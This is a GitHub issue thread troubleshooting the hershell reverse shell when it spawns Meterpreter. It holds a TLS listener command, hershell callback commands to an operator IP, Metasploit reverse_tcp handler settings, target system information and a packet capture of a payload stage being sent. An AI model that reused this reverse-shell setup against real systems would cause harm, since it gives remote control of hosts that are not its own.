SSL Error when spawning meterpreter

pwn-star commented 5 years ago

I'm receiving the same error/issue as seen here using the latest release: https://github.com/sysdream/hershell/issues/2

openssl s_server -cert server.pem -key server.key -accept 8083 Using default temp DH parameters ACCEPT -----BEGIN SSL SESSION PARAMETERS----- MHUCAQECAgMDBALALwQg+FcZskUtPAldc5nOTKfLTeWs13giztsD+3wEZ2Mc4eIE MDH+Q2f/9GhZ8kQRm8ZkND4pvUYWwvqnczUxcNFEtzr9yLAN1Hn7WvOHkY6WJ2ls NaEGAgRdLBSvogQCAhwgpAYEBAEAAAA= -----END SSL SESSION PARAMETERS----- Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512:RSA+SHA1:ECDSA+SHA1 Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512 Supported Elliptic Curve Point Formats: uncompressed Supported Elliptic Groups: X25519:P-256:P-384:P-521 Shared Elliptic groups: X25519:P-256:P-384:P-521

No server certificate CA names sent CIPHER is ECDHE-RSA-AES128-GCM-SHA256 Secure Renegotiation IS supported [hershell]> meterpreter tcp 192.168.71.120:8080 [hershell]> ERROR shutting down SSL CONNECTION CLOSED

Module advanced options (exploit/multi/handler):

Name Current Setting Required Description

ContextInformationFile no The information file that contains context information DisablePayloadHandler false no Disable the handler code for the selected payload EnableContextEncoding false no Use transient context when encoding payloads ExitOnSession false yes Return from the exploit after a session has been created ListenerTimeout 0 no The maximum number of seconds to wait for new sessions VERBOSE true no Enable detailed status messages WORKSPACE no Specify the workspace for this module WfsDelay 0 no Additional delay when waiting for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

AutoLoadStdapi AutoRunScript AutoSystemInfo AutoUnhookProcess AutoVerifySession AutoVerifySessionTimeout 30 EnableStageEncoding EnableUnicodeEncoding HandlerSSLCert InitialAutoRunScript PayloadBindPort PayloadProcessCommandLine PayloadUUIDName PayloadUUIDRaw PayloadUUIDSeed PayloadUUIDTracking PrependMigrate PrependMigrateProc ReverseAllowProxy ReverseListenerBindAddress ReverseListenerBindPort ReverseListenerComm ReverseListenerThreaded SessionCommunicationTimeout 300 SessionExpirationTimeout SessionRetryTotal SessionRetryWait StageEncoder StageEncoderSaveRegisters StageEncodingFallback StagerRetryCount StagerRetryWait VERBOSE WORKSPACE false yes Automatically load the Stdapi extension no A script to run automatically on session creation. false yes Automatically capture system information on initialization. false yes Automatically load the unhook extension and unhook the process false yes Automatically verify and drop invalid sessions no Timeout period to wait for session validation to occur, in seconds false no Encode the second stage payload false yes Automatically encode UTF-8 strings as hexadecimal server.pem no Path to a SSL certificate in unified PEM format, ignored for HTTP transports no An initial script to run on session creation (before AutoRunScript) no Port to bind reverse tcp socket to on target system. no The displayed command line that will be used by the payload no A human-friendly name to reference this unique payload (requires tracking) no A hex string representing the raw 8-byte PUID value for the UUID no A string to use when generating the payload UUID (deterministic) false yes Whether or not to automatically register generated UUIDs false yes Spawns and runs shellcode in new process no Process to spawn and run shellcode in false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST no The specific IP address to bind to on the local system no The port to bind to on the local system if different from LPORT no The specific communication channel to use for this listener false yes Handle every connection in a new thread (experimental) no The number of seconds of no activity before this session should be killed 604800 no The number of seconds before this session should be forcibly shut down 3600 no Number of seconds try reconnecting for on network failure 10 no Number of seconds to wait between reconnect attempts no Encoder to use if EnableStageEncoding is set no Additional registers to preserve in the staged payload if EnableStageEncoding is set true no Fallback to no encoding if the selected StageEncoder is not compatible 10 no The number of times the stager should retry if the first connect fails 5 no Number of seconds to wait for the stager between reconnect attempts true no Enable detailed status messages no Specify the workspace for this module

pwn-star commented 5 years ago

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.71.120 yes The listen address (an interface may be specified) LPORT 8080 yes The listen port

Exploit target:

Id Name

0 Wildcard Target

pwn-star commented 5 years ago

[] Sending stage (179779 bytes) to 192.168.71.98 [] 192.168.71.98 - Meterpreter session 23 closed. Reason: Died [*] Meterpreter session 23 opened (127.0.0.1 -> 192.168.71.98:52445) at 2019-07-15 02:12:12 -0400

sessions -l shows no new meterpreter shells

lesnuages commented 5 years ago

Could you please provide some info about the following elements, so I can address this faster:

target OS version
hershell architecture (amd64/386)

Thanks

lesnuages commented 5 years ago

@pwn-star it should be fixed in 4497a20. Let me know if that's not the case.

pwn-star commented 5 years ago

Thanks for the response! I tested both 32 and 64bit Here's the system info, i'll test right now to if 4497a20 resolves the issue.

C:\Program Files\Windows NT\Accessories>systeminfo systeminfo

Host Name: xxxxxxxxxxx OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: xxxxxxxxxxxx Original Install Date: 8/7/2014, 9:38:31 PM System Boot Time: 7/5/2019, 10:51:15 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. 01: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1696 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 9/21/2015 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 10,240 MB Available Physical Memory: 2,324 MB Virtual Memory: Max Size: 20,477 MB Virtual Memory: Available: 12,445 MB Virtual Memory: In Use: 8,032 MB Page File Location(s): C:\pagefile.sys Domain: xxxxxx Logon Server: N/A Hotfix(s): 475 Hotfix(s) Installed.

                       [02]: KB981392
                       [03]: KB977236
                       [04]: KB981111
                       [05]: KB977238
                       [06]: KB2849697
                       [07]: KB2849696
                       [08]: KB2841134
                       [09]: KB977239
                       [10]: KB2670838
                       [11]: KB2830477
                       [12]: KB2592687
                       [13]: KB981390
                       [14]: KB2386667
                       [15]: KB2425227
                       [16]: KB2506014
                       [17]: KB2506212
                       [18]: KB2506928
                       [19]: KB2509553
                       [20]: KB2511455
                       [21]: KB2515325
                       [22]: KB2533623
                       [23]: KB2536275
                       [24]: KB2536276
                       [25]: KB2544893
                       [26]: KB2545698
                       [27]: KB2547666
                       [28]: KB2552343
                       [29]: KB2560656
                       [30]: KB2563227
                       [31]: KB2564958
                       [32]: KB2570947
                       [33]: KB2574819
                       [34]: KB2584146
                       [35]: KB2585542
                       [36]: KB2603229
                       [37]: KB2604115
                       [38]: KB2607047
                       [39]: KB2608658
                       [40]: KB2620704
                       [41]: KB2621440
                       [42]: KB2631813
                       [43]: KB2636573
                       [44]: KB2639308
                       [45]: KB2640148
                       [46]: KB2643719
                       [47]: KB2644615
                       [48]: KB2647753
                       [49]: KB2653956
                       [50]: KB2654428
                       [51]: KB2655992
                       [52]: KB2656356
                       [53]: KB2660075
                       [54]: KB2667402
                       [55]: KB2676562
                       [56]: KB2685811
                       [57]: KB2685813
                       [58]: KB2685939
                       [59]: KB2690533
                       [60]: KB2698365
                       [61]: KB2705219
                       [62]: KB2712808
                       [63]: KB2718704
                       [64]: KB2719033
                       [65]: KB2719857
                       [66]: KB2726535
                       [67]: KB2729094
                       [68]: KB2729452
                       [69]: KB2731771
                       [70]: KB2732059
                       [71]: KB2736422
                       [72]: KB2742599
                       [73]: KB2743555
                       [74]: KB2750841
                       [75]: KB2756921
                       [76]: KB2758857
                       [77]: KB2761217
                       [78]: KB2763523
                       [79]: KB2765809
                       [80]: KB2770660
                       [81]: KB2785220
                       [82]: KB2786081
                       [83]: KB2789645
                       [84]: KB2791765
                       [85]: KB2798162
                       [86]: KB2800095
                       [87]: KB2807986
                       [88]: KB2808679
                       [89]: KB2813347
                       [90]: KB2813430
                       [91]: KB2820331
                       [92]: KB2832414
                       [93]: KB2834140
                       [94]: KB2835361
                       [95]: KB2839894
                       [96]: KB2840149
                       [97]: KB2840631
                       [98]: KB2843630
                       [99]: KB2844286
                       [100]: KB2847311
                       [101]: KB2849470
                       [102]: KB2852386
                       [103]: KB2853952
                       [104]: KB2857650
                       [105]: KB2861191
                       [106]: KB2861698
                       [107]: KB2861855
                       [108]: KB2862152
                       [109]: KB2862330
                       [110]: KB2862335
                       [111]: KB2862966
                       [112]: KB2862973
                       [113]: KB2863240
                       [114]: KB2864058
                       [115]: KB2864202
                       [116]: KB2868038
                       [117]: KB2868116
                       [118]: KB2868626
                       [119]: KB2871997
                       [120]: KB2872339
                       [121]: KB2876284
                       [122]: KB2876331
                       [123]: KB2882822
                       [124]: KB2884256
                       [125]: KB2887069
                       [126]: KB2888049
                       [127]: KB2891804
                       [128]: KB2892074
                       [129]: KB2893294
                       [130]: KB2893519
                       [131]: KB2894844
                       [132]: KB2898857
                       [133]: KB2900986
                       [134]: KB2908783
                       [135]: KB2911501
                       [136]: KB2912390
                       [137]: KB2919469
                       [138]: KB2922229
                       [139]: KB2923545
                       [140]: KB2926765
                       [141]: KB2928562
                       [142]: KB2929733
                       [143]: KB2931356
                       [144]: KB2937610
                       [145]: KB2939576
                       [146]: KB2943357
                       [147]: KB2957189
                       [148]: KB2957503
                       [149]: KB2957509
                       [150]: KB2961072
                       [151]: KB2966583
                       [152]: KB2968294
                       [153]: KB2970228
                       [154]: KB2972100
                       [155]: KB2972211
                       [156]: KB2973112
                       [157]: KB2973201
                       [158]: KB2973351
                       [159]: KB2976897
                       [160]: KB2977292
                       [161]: KB2977728
                       [162]: KB2978092
                       [163]: KB2978120
                       [164]: KB2979570
                       [165]: KB2984972
                       [166]: KB2985461
                       [167]: KB2991963
                       [168]: KB2992611
                       [169]: KB2993651
                       [170]: KB2999226
                       [171]: KB3000483
                       [172]: KB3003743
                       [173]: KB3004361
                       [174]: KB3004375
                       [175]: KB3005607
                       [176]: KB3005788
                       [177]: KB3006137
                       [178]: KB3006226
                       [179]: KB3006625
                       [180]: KB3010788
                       [181]: KB3011780
                       [182]: KB3013410
                       [183]: KB3014029
                       [184]: KB3014406
                       [185]: KB3018238
                       [186]: KB3019978
                       [187]: KB3020338
                       [188]: KB3020369
                       [189]: KB3020370
                       [190]: KB3020388
                       [191]: KB3021674
                       [192]: KB3022777
                       [193]: KB3023215
                       [194]: KB3030377
                       [195]: KB3031432
                       [196]: KB3032655
                       [197]: KB3033889
                       [198]: KB3033929
                       [199]: KB3035126
                       [200]: KB3035132
                       [201]: KB3037574
                       [202]: KB3039066
                       [203]: KB3040272
                       [204]: KB3042058
                       [205]: KB3042553
                       [206]: KB3045171
                       [207]: KB3045645
                       [208]: KB3045685
                       [209]: KB3045999
                       [210]: KB3046017
                       [211]: KB3046269
                       [212]: KB3046482
                       [213]: KB3048070
                       [214]: KB3048761
                       [215]: KB3054205
                       [216]: KB3054476
                       [217]: KB3055642
                       [218]: KB3057154
                       [219]: KB3059317
                       [220]: KB3060716
                       [221]: KB3061518
                       [222]: KB3063858
                       [223]: KB3064209
                       [224]: KB3065822
                       [225]: KB3065979
                       [226]: KB3065987
                       [227]: KB3067505
                       [228]: KB3068457
                       [229]: KB3068708
                       [230]: KB3069392
                       [231]: KB3070102
                       [232]: KB3071756
                       [233]: KB3072305
                       [234]: KB3072595
                       [235]: KB3072630
                       [236]: KB3072633
                       [237]: KB3074543
                       [238]: KB3074886
                       [239]: KB3075226
                       [240]: KB3075249
                       [241]: KB3075516
                       [242]: KB3076895
                       [243]: KB3077657
                       [244]: KB3077715
                       [245]: KB3078601
                       [246]: KB30

Network Card(s): 1 NIC(s) Installed. 01: vmxnet3 Ethernet Adapter Connection Name: Local Area Connection DHCP Enabled: No IP address(es)

pwn-star commented 5 years ago

same error happens with both 32 and 64 bit payloads, using meterpreter x64 and 386 payloads reverse_tcp payloads.

pwn-star commented 5 years ago

Module advanced options (exploit/multi/handler):

Name Current Setting Required Description

ContextInformationFile no The information file that contains context information DisablePayloadHandler false no Disable the handler code for the selected payload EnableContextEncoding false no Use transient context when encoding payloads ExitOnSession true yes Return from the exploit after a session has been created ListenerTimeout 0 no The maximum number of seconds to wait for new sessions VERBOSE true no Enable detailed status messages WORKSPACE no Specify the workspace for this module WfsDelay 0 no Additional delay when waiting for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

AutoLoadStdapi true yes Automatically load the Stdapi extension AutoRunScript no A script to run automatically on session creation. AutoSystemInfo true yes Automatically capture system information on initialization. AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process AutoVerifySession true yes Automatically verify and drop invalid sessions AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds EnableStageEncoding false no Encode the second stage payload EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal HandlerSSLCert ./server.pem no Path to a SSL certificate in unified PEM format, ignored for HTTP transports InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) PayloadBindPort no Port to bind reverse tcp socket to on target system. PayloadProcessCommandLine no The displayed command line that will be used by the payload PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs PrependMigrate false yes Spawns and runs shellcode in new process PrependMigrateProc no Process to spawn and run shellcode in ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST ReverseListenerBindAddress no The specific IP address to bind to on the local system ReverseListenerBindPort no The port to bind to on the local system if different from LPORT ReverseListenerComm no The specific communication channel to use for this listener ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure SessionRetryWait 10 no Number of seconds to wait between reconnect attempts StageEncoder no Encoder to use if EnableStageEncoding is set StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible StagerRetryCount 10 no The number of times the stager should retry if the first connect fails StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts VERBOSE true no Enable detailed status messages WORKSPACE no Specify the workspace for this module

pwn-star commented 5 years ago

attempt with 32 bit http:

Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512:RSA+SHA1:ECDSA+SHA1 Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512 Supported Elliptic Curve Point Formats: uncompressed Supported Elliptic Groups: X25519:P-256:P-384:P-521 Shared Elliptic groups: X25519:P-256:P-384:P-521

No server certificate CA names sent CIPHER is ECDHE-RSA-AES128-GCM-SHA256 Secure Renegotiation IS supported [hershell]> meterpreter http 192.168.71.120:8081 Get http://192.168.71.120:8081/pOYOONTTmsxX: net/http: HTTP/1.x transport connection broken: malformed HTTP status code "program" [hershell]> meterpreter http 192.168.71.120:8081 [hershell]> ERROR shutting down SSL CONNECTION CLOSED

pwn-star commented 5 years ago

tcpdump -v -i eth0 'port 8081' tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 02:26:50.263836 IP (tos 0x0, ttl 128, id 30064, offset 0, flags [DF], proto TCP (6), length 52) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [S], cksum 0x249b (correct), seq 1019336057, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 02:26:50.263881 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 52) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [S.], cksum 0x1052 (incorrect -> 0xdb1d), seq 2368105014, ack 1019336058, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0 02:26:50.264125 IP (tos 0x0, ttl 128, id 30065, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x8bff (correct), ack 1, win 513, length 0 02:26:50.303876 IP (tos 0x0, ttl 64, id 54307, offset 0, flags [DF], proto TCP (6), length 44) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x104a (incorrect -> 0x4751), seq 1:5, ack 1, win 229, length 4 02:26:50.305717 IP (tos 0x0, ttl 64, id 54308, offset 0, flags [DF], proto TCP (6), length 7340) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x2cca (incorrect -> 0x896b), seq 5:7305, ack 1, win 229, length 7300 02:26:50.305742 IP (tos 0x0, ttl 64, id 54313, offset 0, flags [DF], proto TCP (6), length 5880) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x2716 (incorrect -> 0xa2de), seq 7305:13145, ack 1, win 229, length 5840 02:26:50.306070 IP (tos 0x0, ttl 128, id 30066, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x58ad (correct), ack 13145, win 507, length 0 02:26:50.306096 IP (tos 0x0, ttl 64, id 54317, offset 0, flags [DF], proto TCP (6), length 14640) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x494e (incorrect -> 0x7354), seq 13145:27745, ack 1, win 229, length 14600 02:26:50.306113 IP (tos 0x0, ttl 64, id 54327, offset 0, flags [DF], proto TCP (6), length 14640) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x494e (incorrect -> 0xe08f), seq 27745:42345, ack 1, win 229, length 14600 02:26:50.306237 IP (tos 0x0, ttl 128, id 30067, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x47a2 (correct), ack 17525, win 490, length 0 02:26:50.306258 IP (tos 0x0, ttl 64, id 54337, offset 0, flags [DF], proto TCP (6), length 8800) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x327e (incorrect -> 0x6363), seq 42345:51105, ack 1, win 229, length 8760 02:26:50.306272 IP (tos 0x0, ttl 128, id 30068, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3697 (correct), ack 21905, win 473, length 0 02:26:50.306282 IP (tos 0x0, ttl 64, id 54343, offset 0, flags [DF], proto TCP (6), length 8800) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x327e (incorrect -> 0x0a87), seq 51105:59865, ack 1, win 229, length 8760 02:26:50.306312 IP (tos 0x0, ttl 128, id 30069, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x1fde (correct), ack 27745, win 450, length 0 02:26:50.306346 IP (tos 0x0, ttl 128, id 30070, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x1fd0 (correct), ack 27745, win 464, length 0 02:26:50.306396 IP (tos 0x0, ttl 128, id 30071, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x1f9f (correct), ack 27745, win 513, length 0 02:26:50.306410 IP (tos 0x0, ttl 128, id 30072, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xfd88 (correct), ack 36505, win 479, length 0 02:26:50.306421 IP (tos 0x0, ttl 64, id 54349, offset 0, flags [DF], proto TCP (6), length 26320) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x76ee (incorrect -> 0x5889), seq 59865:86145, ack 1, win 229, length 26280 02:26:50.306448 IP (tos 0x0, ttl 128, id 30073, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xfd7b (correct), ack 36505, win 492, length 0 02:26:50.306471 IP (tos 0x0, ttl 128, id 30074, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xfd66 (correct), ack 36505, win 513, length 0 02:26:50.306522 IP (tos 0x0, ttl 128, id 30075, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xca18 (correct), ack 49645, win 507, length 0 02:26:50.306540 IP (tos 0x0, ttl 64, id 54367, offset 0, flags [DF], proto TCP (6), length 12204) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x3fca (incorrect -> 0x8f67), seq 86145:98309, ack 1, win 229, length 12164 02:26:50.306554 IP (tos 0x0, ttl 128, id 30076, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xca12 (correct), ack 49645, win 513, length 0 02:26:50.306629 IP (tos 0x0, ttl 128, id 30077, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xa226 (correct), ack 59865, win 513, length 0 02:26:50.306658 IP (tos 0x0, ttl 64, id 54376, offset 0, flags [DF], proto TCP (6), length 32160) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x8dbe (incorrect -> 0x193c), seq 98309:130429, ack 1, win 229, length 32120 02:26:50.306680 IP (tos 0x0, ttl 128, id 30078, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x8010 (correct), ack 68625, win 479, length 0 02:26:50.306725 IP (tos 0x0, ttl 128, id 30079, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x6957 (correct), ack 74465, win 456, length 0 02:26:50.306764 IP (tos 0x0, ttl 128, id 30080, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x584c (correct), ack 78845, win 439, length 0 02:26:50.306816 IP (tos 0x0, ttl 64, id 54398, offset 0, flags [DF], proto TCP (6), length 32160) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x8dbe (incorrect -> 0xf1b5), seq 130429:162549, ack 1, win 229, length 32120 02:26:50.306840 IP (tos 0x0, ttl 128, id 30081, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x4193 (correct), ack 84685, win 416, length 0 02:26:50.306854 IP (tos 0x0, ttl 128, id 30082, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3088 (correct), ack 89065, win 399, length 0 02:26:50.306918 IP (tos 0x0, ttl 128, id 30083, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x19c2 (correct), ack 94905, win 389, length 0 02:26:50.306954 IP (tos 0x0, ttl 128, id 30084, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x194c (correct), ack 94905, win 507, length 0 02:26:50.306987 IP (tos 0x0, ttl 128, id 30085, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x00b1 (correct), ack 101229, win 482, length 0 02:26:50.307003 IP (tos 0x0, ttl 128, id 30086, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x00a3 (correct), ack 101229, win 496, length 0 02:26:50.307027 IP (tos 0x0, ttl 128, id 30087, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x0092 (correct), ack 101229, win 513, length 0 02:26:50.307062 IP (tos 0x0, ttl 64, id 54420, offset 0, flags [DF], proto TCP (6), length 16100) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x4f02 (incorrect -> 0xf019), seq 162549:178609, ack 1, win 229, length 16060 02:26:50.307069 IP (tos 0x0, ttl 64, id 54431, offset 0, flags [DF], proto TCP (6), length 1215) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x14dd (incorrect -> 0x50b3), seq 178609:179784, ack 1, win 229, length 1175 02:26:50.307089 IP (tos 0x0, ttl 128, id 30088, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xd2f1 (correct), ack 112909, win 513, length 0 02:26:50.307143 IP (tos 0x0, ttl 128, id 30089, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xb67e (correct), ack 120209, win 496, length 0 02:26:50.307201 IP (tos 0x0, ttl 128, id 30090, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x9469 (correct), ack 128969, win 461, length 0 02:26:50.307248 IP (tos 0x0, ttl 128, id 30091, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x835e (correct), ack 133349, win 444, length 0 02:26:50.307296 IP (tos 0x0, ttl 128, id 30092, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x6ca4 (correct), ack 139189, win 422, length 0 02:26:50.307346 IP (tos 0x0, ttl 128, id 30093, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x55eb (correct), ack 145029, win 399, length 0 02:26:50.307398 IP (tos 0x0, ttl 128, id 30094, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3f32 (correct), ack 150869, win 376, length 0 02:26:50.307423 IP (tos 0x0, ttl 128, id 30095, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3f25 (correct), ack 150869, win 389, length 0 02:26:50.307442 IP (tos 0x0, ttl 128, id 30096, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3ea9 (correct), ack 150869, win 513, length 0 02:26:50.307522 IP (tos 0x0, ttl 128, id 30097, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x0b61 (correct), ack 164009, win 501, length 0 02:26:50.307546 IP (tos 0x0, ttl 128, id 30098, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x0b55 (correct), ack 164009, win 513, length 0 02:26:50.307627 IP (tos 0x0, ttl 128, id 30099, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xe368 (correct), ack 174229, win 513, length 0 02:26:50.307699 IP (tos 0x0, ttl 128, id 30100, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xcdb5 (correct), ack 179784, win 513, length 0 02:26:50.309708 IP (tos 0x0, ttl 128, id 30101, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [F.], cksum 0xcdb4 (correct), seq 1, ack 179784, win 513, length 0 02:26:50.312120 IP (tos 0x0, ttl 64, id 54432, offset 0, flags [DF], proto TCP (6), length 40) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x1046 (incorrect -> 0xced0), ack 2, win 229, length 0 02:26:50.641058 IP (tos 0x0, ttl 64, id 54433, offset 0, flags [DF], proto TCP (6), length 611) 192.168.71.120.tproxy > targetserver.xxx.corp.59517: 